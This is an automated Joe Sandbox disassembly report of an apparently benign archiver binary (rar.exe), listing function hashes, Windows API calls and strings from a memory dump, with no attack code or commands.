                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 481a6244aa78f3690721209afba1077f4be42ed0cb1ad071d5ce1956372566aa
                                                              • Instruction ID: 53b08ff41ac16b6623986e637a286a0fc252809b0c26b71657e8176419a582be
                                                              • Opcode Fuzzy Hash: 481a6244aa78f3690721209afba1077f4be42ed0cb1ad071d5ce1956372566aa
                                                              • Instruction Fuzzy Hash: 6A513673528BD195EB009F24A8441EE37A8F745F88F19423ADF884B79ADF396161D331
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                              • String ID:
                                                              • API String ID: 3947729631-0
                                                              • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                              • Instruction ID: 5ac7d6a3826672f8fcdd3c45c9857acad76f4f61f3da8b000f4b858aca2dab65
                                                              • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                              • Instruction Fuzzy Hash: 5E41C221E1A64B86FF689F25DC5027F2251AFD6742F004439DA0DC76A5DE3CE845E742
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CommandLine
                                                              • String ID:
                                                              • API String ID: 3253501508-0
                                                              • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                              • Instruction ID: 9a13f926b2779837834b7ed333ef60e0a1b63e61849da195dfae7070af5024ca
                                                              • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                              • Instruction Fuzzy Hash: E701C41160C64685EF10AF16AD001BF5661BFCBB96F480431EE4D47365EE3DD841A302
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                              • Instruction ID: bcc0096163bc8773b495c3a99e423b07a7db97eacb0cbce1c4e2bfd91e21fe2d
                                                              • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                              • Instruction Fuzzy Hash: F0012160A1C68B41FD649E66DE4027F31925FD7BD6F188630DE1DE62D6ED1CA4017103
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CompareString
                                                              • String ID:
                                                              • API String ID: 1825529933-0
                                                              • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                              • Instruction ID: 1e17feed84ea3615435274a6f6310ebcf2b07544d0662c99b90893721b18db7d
                                                              • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                              • Instruction Fuzzy Hash: 0E01446170CA5685EE109F53A80406FA611ABDBFC1F5C4534EF8D9BB5ACE3DE0429709
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                              • Instruction ID: e843a2e5fab6c21cf850c79b9812a6df46254ad5b22fc5fbb1ff433f2484b1b1
                                                              • Opcode Fuzzy Hash: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                              • Instruction Fuzzy Hash: 20F081219082C546DE159F7199013FE2751AB87BBAF084335DEBC4B2CBCE6C90849722
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                              • Instruction ID: efe0af6f1a3bb512e25e0fff0595a1a28e2eff838a1a648caa99a5cfa0d39cc4
                                                              • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                              • Instruction Fuzzy Hash: 53F05415A1D28E40FD946E629C8027F22924FC67A2F080A34ED2DD53C1DE5CE4416116
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                              • Instruction ID: 21bcadc82329620248b65dc8f8f14db70ac4b862c7d81e7319570bb6f801b9a5
                                                              • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                              • Instruction Fuzzy Hash: 39F0FF22A0824A44FF248F20E8483BE2250DB82BBAF685330D23C850D8CF28D893D352
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                              • Instruction ID: a8add1610653921f09f4fe96836c473ba67a97f320542a2d2860c503f9d1c6fe
                                                              • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                              • Instruction Fuzzy Hash: 13E09A50F1930E41ED5D2E621C5107E02419F9BB82E555439D91E8EB82AD2EA4557712
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                              • Instruction ID: f520c22a519da044a257c0007ebe333de436a1715a0124cf41c93b0e335f8dfe
                                                              • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                              • Instruction Fuzzy Hash: 0ED01765E2AD0E82FF04DF41EC4433A2261AFE639BF514634C40C846508FAC2444BB02
                                                              APIs
                                                              • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B14549
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                              • Instruction ID: 23519664df3fbfc6256494e6c5935e06b90c8485179d0ebcc94eda11b0213bbd
                                                              • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                              • Instruction Fuzzy Hash: 45C02B21E0548680CD045B2F8C5A13C2110BFC7B37FD41330C23D451E0CF1810EB4301
                                                              APIs
                                                              • CreateFileW.KERNEL32 ref: 00007FF629B0D4A6
                                                              • CloseHandle.KERNEL32 ref: 00007FF629B0D4B9
                                                                • Part of subcall function 00007FF629B0EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF629B0EE47), ref: 00007FF629B0EF73
                                                                • Part of subcall function 00007FF629B0EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF629B0EE47), ref: 00007FF629B0EF84
                                                                • Part of subcall function 00007FF629B0EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF629B0EFA7
                                                                • Part of subcall function 00007FF629B0EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF629B0EFCA
                                                                • Part of subcall function 00007FF629B0EF50: GetLastError.KERNEL32 ref: 00007FF629B0EFD4
                                                                • Part of subcall function 00007FF629B0EF50: CloseHandle.KERNEL32 ref: 00007FF629B0EFE7
                                                              • CreateDirectoryW.KERNEL32 ref: 00007FF629B0D4C6
                                                              • CreateFileW.KERNEL32 ref: 00007FF629B0D64A
                                                              • DeviceIoControl.KERNEL32 ref: 00007FF629B0D68B
                                                              • CloseHandle.KERNEL32 ref: 00007FF629B0D69A
                                                              • GetLastError.KERNEL32 ref: 00007FF629B0D6AD
                                                              • RemoveDirectoryW.KERNEL32 ref: 00007FF629B0D6FA
                                                              • DeleteFileW.KERNEL32 ref: 00007FF629B0D705
                                                                • Part of subcall function 00007FF629B12310: FlushFileBuffers.KERNEL32 ref: 00007FF629B1233E
                                                                • Part of subcall function 00007FF629B12310: SetFileTime.KERNEL32 ref: 00007FF629B123DB
                                                                • Part of subcall function 00007FF629B11930: FindCloseChangeNotification.KERNELBASE ref: 00007FF629B11958
                                                                • Part of subcall function 00007FF629B139E0: SetFileAttributesW.KERNEL32(?,00007FF629B134EE,?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B13A0F
                                                                • Part of subcall function 00007FF629B139E0: SetFileAttributesW.KERNEL32(?,00007FF629B134EE,?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B13A3C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: File$Close$CreateHandle$AttributesDirectoryErrorLastProcessToken$AdjustBuffersChangeControlCurrentDeleteDeviceFindFlushLookupNotificationOpenPrivilegePrivilegesRemoveTimeValue
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 2827264287-3508440684
                                                              • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                              • Instruction ID: df852874d813e6872ed19f9520ed5e15e39564c9c1c9bcc98071937d93702583
                                                              • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                              • Instruction Fuzzy Hash: 54D1C026A0868A85EF209F21D9402FE73A0FFC6799F404131DA5D876D9DF3DE50AE702
                                                              APIs
                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3AEE9
                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3AF01
                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3AF19
                                                              • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3AF75
                                                              • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3AFB0
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3B23B
                                                              • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3B244
                                                              • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3B287
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                              • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                              • API String ID: 3483800833-4165214152
                                                              • Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                              • Instruction ID: 73ddcc5efddaeace6bc4384ae31165ddfe055970f187afffc4b3c856f04c9d8a
                                                              • Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                              • Instruction Fuzzy Hash: D4C18C22A19A8A86EF10EF22EC502FE37A0FB86B95F440135DA4D87799DF3CE505D701
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF629AF2014), ref: 00007FF629B0E298
                                                              • FindClose.KERNEL32(?,?,?,00000001,?,00007FF629AF2014), ref: 00007FF629B0E2AB
                                                              • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF629AF2014), ref: 00007FF629B0E2F7
                                                                • Part of subcall function 00007FF629B0EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF629B0EE47), ref: 00007FF629B0EF73
                                                                • Part of subcall function 00007FF629B0EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF629B0EE47), ref: 00007FF629B0EF84
                                                                • Part of subcall function 00007FF629B0EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF629B0EFA7
                                                                • Part of subcall function 00007FF629B0EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF629B0EFCA
                                                                • Part of subcall function 00007FF629B0EF50: GetLastError.KERNEL32 ref: 00007FF629B0EFD4
                                                                • Part of subcall function 00007FF629B0EF50: CloseHandle.KERNEL32 ref: 00007FF629B0EFE7
                                                              • DeviceIoControl.KERNEL32 ref: 00007FF629B0E357
                                                              • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF629AF2014), ref: 00007FF629B0E362
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                              • String ID: SeBackupPrivilege
                                                              • API String ID: 3094086963-2429070247
                                                              • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                              • Instruction ID: b025e8e681e76cf97e464685f6c5b3c87aad954fed80941c5fde377eedbdf88b
                                                              • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                              • Instruction Fuzzy Hash: CF61D236A1864686EF248F21E9402FE3360FB86799F404239DB6E976D4DF3CE145E702
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Sleepswprintf
                                                              • String ID: $%ls%0*u.rev
                                                              • API String ID: 407366315-3491873314
                                                              • Opcode ID: 782f304219662b4eecf027b144e7046621da4246e6178cffb5e29678f0c5f42f
                                                              • Instruction ID: 8122ee4a4e160657023ab1bd96a0b6740bc15c151a77c02f6e5ad24a94da0c69
                                                              • Opcode Fuzzy Hash: 782f304219662b4eecf027b144e7046621da4246e6178cffb5e29678f0c5f42f
                                                              • Instruction Fuzzy Hash: AD02F132E0469686EF20DF26D8542AE73A5FBCA785F40013ADE5D8BB99DE3CE441D701
                                                              APIs
                                                              • new.LIBCMT ref: 00007FF629AF4BD8
                                                                • Part of subcall function 00007FF629B3B6D0: Sleep.KERNEL32(?,?,?,?,00007FF629B0CBED,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B3B730
                                                                • Part of subcall function 00007FF629B11E80: CreateFileW.KERNELBASE ref: 00007FF629B11F4A
                                                                • Part of subcall function 00007FF629B11E80: GetLastError.KERNEL32 ref: 00007FF629B11F59
                                                                • Part of subcall function 00007FF629B11E80: CreateFileW.KERNELBASE ref: 00007FF629B11F99
                                                                • Part of subcall function 00007FF629B11E80: GetLastError.KERNEL32 ref: 00007FF629B11FA2
                                                                • Part of subcall function 00007FF629B11E80: SetFileTime.KERNEL32 ref: 00007FF629B11FF1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$SleepTime
                                                              • String ID: %12s %s$%12s %s$ $%s
                                                              • API String ID: 2965465231-221484280
                                                              • Opcode ID: 05a7e0e299e76d3b599cecb2db35fae30976aa6c46bd72ff832a0ef8c8ec7fe1
                                                              • Instruction ID: 5451078557c3eb9e69904f9499193867b86e488ee7d0074b79f3b4b45b863256
                                                              • Opcode Fuzzy Hash: 05a7e0e299e76d3b599cecb2db35fae30976aa6c46bd72ff832a0ef8c8ec7fe1
                                                              • Instruction Fuzzy Hash: CAF1BA22B09A4686EF60DF12D8582BE73A0FB86B88F444035DE4D87786DF3ED555E702
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
